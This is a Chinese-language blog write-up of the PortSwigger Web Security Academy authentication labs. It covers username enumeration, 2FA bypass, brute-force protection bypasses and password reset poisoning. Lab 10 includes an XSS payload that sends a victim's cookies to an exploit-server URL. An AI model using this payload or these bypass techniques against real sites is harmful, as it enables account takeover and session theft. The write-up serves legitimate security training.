PortSwigger Authentication

最新推荐文章于 2024-05-23 22:13:30 发布
最新推荐文章于 2024-05-23 22:13:30 发布
阅读量882 收藏 19
点赞数 15
文章标签: 服务器 数据库 linux 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/135214167
版权

lab1: Username enumeration via different responses

给了可能的用户名密码

直接爆

image-20231223120519323

lab2: 2FA broken logic

access Carlos’s account page

登录步骤如下

/login1 验证用户名密码

/login2 发验证码 验证验证码

其中访问login2的时候会带上cookie

image-20231221172230175

猜测当vertify的值为carlos的时候 会向carlos的邮箱发验证码

image-20231221172305209

然后post /login2 传mfa-code

由于没有限制 考虑爆破

image-20231221172011276

lab3: Password reset broken logic

重置密码的最后一个阶段 我们传的参数中带了username 尝试改为carlos

image-20231222083239003

image-20231222083314943

lab4: Username enumeration via subtly different responses

image-20231223123242719

看了一下solution

是先跑的合法用户名 再爆的密码

过程如下

当账户不合法的时候返回的是

Invalid username or password. 合法的时候返回 Invalid username or password

相差一个.

然后得到账户再爆密码就快多了

lab5: Username enumeration via response timing

image-20231223123953214

加XFF

image-20231223234352651

这个环境下username正确 密码越长响应时间越久

image-20231223234719148

lab6: Broken brute-force protection, IP block

比较扯淡

登录失败三次ban ip

在ban ip之前登录正确可以重置计数器

image-20231224000510026

开俩爆破 一个跑正确密码

另一个爆密码 加个延迟

lab7: Username enumeration via account lock

先多多爆几次 把合法的用户爆出来

image-20231224002156541

然后爆密码

image-20231224003104874

这个没回显的就是正确的密码 等待一分钟后提交

lab8: 2FA simple bypass

莫名其妙完成的

回头去看solution

image-20231222084522132

说是在carlos接收到验证码的时候

直接访问/my-account

我的理解是这里的登录分3步 login login2 然后重定向到my-account

在login2处直接访问my-account就跳过了login2的验证

lab9: Brute-forcing a stay-logged-in cookie

image-20231224093854165

image-20231224093926060

cookie的构成是用户名:密码md5

image-20231224094244662

image-20231224094531172

lab10: Offline password cracking

<script>document.location='https://exploit-0a82002e033db374830b2db4013f00bd.exploit-server.net/exploit'+document.cookie</script>

image-20231224095300277

image-20231224095329698

image-20231224095509229

lab11: Password reset poisoning via middleware

看solution得知支持X-Forwarded-Host 可以使用它来将动态生成的重置链接指向任意域

image-20231224101120014

image-20231224101113433

lab12: Password brute-force via password change

当新密码不一致且密码正确的时候会报new pass do not match

密码错误的时候会报 Current password is incorrect

user换carlos爆

在爆破的时候要确保当前的cookie是可用的 不然会302到登录界面

image-20231224102948479

lab13: Broken brute-force protection, multiple credentials per request

image-20231224104315991

用了json来传输密码

考虑把密码改成数组

image-20231224104344602

lab14: 2FA bypass using a brute-force attack

学习burp宏的使用

add 一个 session rule

image-20231224113001702

urlscope选择all

image-20231224113025345

新建规则

image-20231224113047588

新建宏

image-20231224113101239

手动去完成一次登录操作 login -> login2

然后在宏里选择对应的数据包

test macro测试下POST login2是否返回200

200就说明操作对了

一路ok下去 回头设置intruder

确保一个线程image-20231224113229244

image-20231224112651249

手动跳转一下image-20231224112838264

image-20231224112943782

丨Arcueid丨
关注
  • 15
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
portswigger证书
11-19
portswigger证书,der格式、pem格式,转化好的,直接可以用哦! Android设备抓包必备哦!
Lab: Username enumeration via response timing 通过响应时间来甄别用户名靶场复盘
Zeker62的博客
08-19 608
靶场内容 This lab is vulnerable to username enumeration using its response times. To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page. Your credentials: wiener:peter Candidate usernames Candidate passw
Burpsuite靶场练习历程(一)--Authentication.Vulnerabilities in password-based login
absoluty_wk的博客
11-11 4163
一、前言 博主本人从普通测试转职安全测试已有一年多,之前的公司项目是个嵌入式平台,工作中更多相关安全流程及前移,最终跳槽。现在工作现内容为web测试与SDL流程相结合,虽有更多机会进行安全渗透,但也愈感半路出家的自己自身能力之不足。 一方面工作同时磨练自己技术,一方面网上学习大佬们的博客开拓眼界。逐渐萌生自己创作博客的念头,刚好最近空闲时刷burp靶场打磨基础,遂将自己的学习过程分享出来,也算是对自己学习的一种激励和记录。 burp靶场地址:Learni...
Lab: Username enumeration via different responses:通过不同的响应来验证用户名是否正确复盘
Zeker62的博客
08-18 406
靶场内容: This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists: Candidate usernames Candidate passwords To solve the lab, enum
PortSwigger Academy | Authentication : 身份认证
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-14 2238
文章目录什么是身份验证?身份验证和授权有什么区别?身份验证漏洞是如何产生的?易受攻击的身份验证有何影响?身份验证机制中的漏洞 ↓第三方身份验证机制中的漏洞防止对您自己的身份验证机制的攻击 ↓如何保护身份验证机制注意用户凭据不要指望用户来保证安全防止用户名枚举实施强大的暴力破解保护反复检查验证逻辑别忘了补充功能实施适当的多因素身份验证 在本节中,我们将介绍一些网站使用的最常见的身份验证机制,并讨论其中的潜在漏洞。我们将重点介绍不同身份验证机制中的固有漏洞,以及由于身份验证的不恰当实现而引入的一些典型漏洞。最
Lab: Authentication bypass via encryption oracle 漏洞平台
gyh3534的博客
07-02 1332
https://portswigger.net/业务web-security/logic-flaws 学习地址在线计算字符串长度-开发者工具网 线上字符串长度计算;在线时间戳转换工具 时间戳在线换算Base64笔记 - 阮一峰的网络日志 base64讲解先说问题:1、希望懂加密算法的朋友,帮忙留言,文章中的问题;base64 解码后,hex 处理,留下的字符数应该是一样的,为什么长度却不一样??本题难点是对加密原理的理解,和对base64 解码内容修改; 解题思路:1、登录用户时,使用题解给的账号密码登录,
Lab: Authentication bypass via information disclosure:通过信息泄露绕过认证
Zeker62的博客
08-24 456
靶场内容 该实验室的管理界面存在身份验证绕过漏洞,但在不了解前端使用的自定义 HTTP 标头的情况下利用该漏洞是不切实际的。 要解决实验室问题,请获取标头名称,然后使用它绕过实验室的身份验证。访问管理界面并删除卡洛斯的帐户。 您可以使用以下凭据登录自己的帐户: wiener:peter 靶场解析 在 Burp Repeater 中,浏览到GET /admin. 响应表明,只有以管理员身份登录或...
Lab:Password reset broken logic 密码重置逻辑破坏漏洞靶场复盘
Zeker62的博客
08-20 563
靶场内容: 该实验室的密码重置功能易受攻击。要解决实验室问题,请重置 Carlos 的密码,然后登录并访问他的“我的帐户”页面。 您的凭据: wiener:peter 受害者用户名: carlos 漏洞分析 密码最棘手的东西就是token,但是这个靶场的漏洞是,光有token但不核对 使用forget password链接,点进去,输入用户名wiener 到邮箱点击链接,重置密码 到http history里面找到刚刚的/forgot-password?temp-forgot-password-token
burpsuitezhengshu
02-04
burpsuite safty credenticate service,...................................................................................................
buby:PortSwigger Burp Suite 的 BurpExtender 接口的 JRuby 实现
06-08
说明: Buby 是 JRuby 与 PortSwigger 流行的商业 Web 安全测试工具 Burp Suite 的混搭。 Burp 由使用 BurpExtender API 的 Java 扩展或使用新的嵌入式 JRuby 支持的 JRuby BurpExtender 实现驱动并绑定到 JRuby。 ...
googleauthenticator:Burp Suite插件,可动态生成用于会话处理规则的Google 2FA代码(由PortSwigger批准,可包含在其官方BApp Store中)
02-03
GoogleAuthenticator Burp Suite扩展程序,用于将当前的Google两因素身份验证(2FA)代码应用于相关请求。 这个Burp Suite扩展程序将Burp变成了Google Authenticator客户端。 当前的Google 2FA代码会自动应用于相关...
swurg:将OpenAPI文档解析到Burp Suite中以自动执行基于OpenAPI的API安全评估(PortSwigger批准将其包含在其官方BApp Store中)
02-03
Swurg是Burp Suite扩展,专门用于OpenAPI测试。 OpenAPI规范(OAS)为REST API定义了标准的,与编程语言无关的接口描述,使人和计算机都可以发现和理解服务的功能,而无需访问源代码,附加文档或检查网络流量。...
用于与 HTTP 服务器通信的函数
安徽锐锋科技-沐雨潇竹
05-21 619
将对在不更改结构的情况下不允许用于 URL 的所有字母进行掩蔽。将指定数据从 Base64 编码解码为原始状态,对传递的 Base64 编码文本中的二进制数据进行转换。decodeQuotedPrintableString 函数取消掩蔽由引用的可打印编码掩蔽的所有字母,将其转换为原始形式的传递文本。对引用的可打印编码中传递的字符串进行编码,其中将掩蔽不允许在 URL 中使用的所有字母,而不更改其结构。字符串数据类型的 FileName 参数用于指定要将解码后的数据保存到其中的文件的名称。
Linux 磁盘管理命令 mdadm:RAID设置工具
最新发布
感谢关注-最近在编写开源的自动化测试框架还没整理完
05-23 518
mdadm:RAID设置工具
Django使用AJAX向服务器发起请求
wanghuizheng的专栏
05-20 410
AJAX(Asynchronous JavaScript and XML)是一种用于创建交互式网页应用程序的技术,它允许在不重新加载整个页面的情况下向服务器发送和接收数据。通过 AJAX,网页可以异步地向服务器发起请求并在后台进行处理,然后在不刷新页面的情况下更新页面的部分内容。:AJAX 的核心是 JavaScript,它负责在客户端(浏览器)发起请求、处理响应,并更新页面的内容。:XHR 是在 JavaScript 中用于向服务器发起 HTTP 请求和接收响应的对象。
Linux:iptables防火墙部署优化之路由转发(地址伪装)
fox_kang的博客
05-20 435
准备工作:​ 1.已知node2的主机名称为node2.timinglee.org其ip为192.168.0.200​ 2.已知node1的主机名为node1.timinglee.org,此主机为双网卡主机其IP为172.25.254.200和192.168.0.100,请在此主机中配置策略可以使node2主机访问外网。
视频网站类如何选择服务器?
wanhengwangluo的博客
05-18 382
随着互联网的快速发展,其中视频网站行业也变得更加的多样化,越来越多的人们使用视频软件,这极大的促进了视频行业的快速发展,企业为了能够呈现出流畅清晰的视频,就需要选择合适的服务器来保证后面正常的运行,那么视频网站类行业还怎样选择服务器呢?首先视频占用的容量会比较大,所以为了能够更好的调度文件传输,需要中上配置支持的服务器才能减少冗余,将各个部件进行紧密的结合,如果选择的服务器配置不够高的话,当用户访问量过多时,会超出服务器所能承载的范围,从而造成服务器崩溃。
portswigger Authentication
07-28
PortSwigger是一家网络安全公司,他们开发了一款名为Burp Suite的强大的网络安全测试工具。在Burp Suite中,有一个功能模块是用于进行身份验证测试的,即Authentication模块。这个模块可以帮助安全专业人员测试应用程序的身份验证机制的安全性。在进行身份验证测试时,可能会涉及到JSON Web Token(JWT)的使用。JWT是一种用于在网络应用之间传递信息的安全方式。然而,JWT也存在一些安全漏洞,其中一些与身份验证相关。引用\[1\]提到了一些JWT的实现缺陷,如没有正确验证签名、服务器密钥泄露等问题。引用\[2\]提到了一些可能存在的攻击,如注入自签名证书和JWT算法混乱。引用\[3\]提到了一些签名算法的安全性问题。在进行PortSwiggerAuthentication模块测试时,可以关注这些JWT相关的安全问题,以帮助发现和修复应用程序中的身份验证漏洞。 #### 引用[.reference_title] - *1* *2* *3* [portswigger JWT attacks](https://blog.csdn.net/weixin_63231007/article/details/127684964)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值